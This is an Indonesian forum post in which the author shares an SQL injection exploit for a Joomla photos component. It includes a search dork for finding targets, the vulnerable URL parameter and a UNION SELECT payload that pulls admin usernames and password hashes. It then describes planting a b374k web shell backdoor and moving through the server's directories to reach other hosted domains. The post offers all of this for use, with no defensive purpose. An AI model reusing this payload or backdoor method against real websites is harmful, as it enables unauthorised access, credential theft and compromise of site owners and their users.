cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com | http://anharku.tk | http://anharku.us
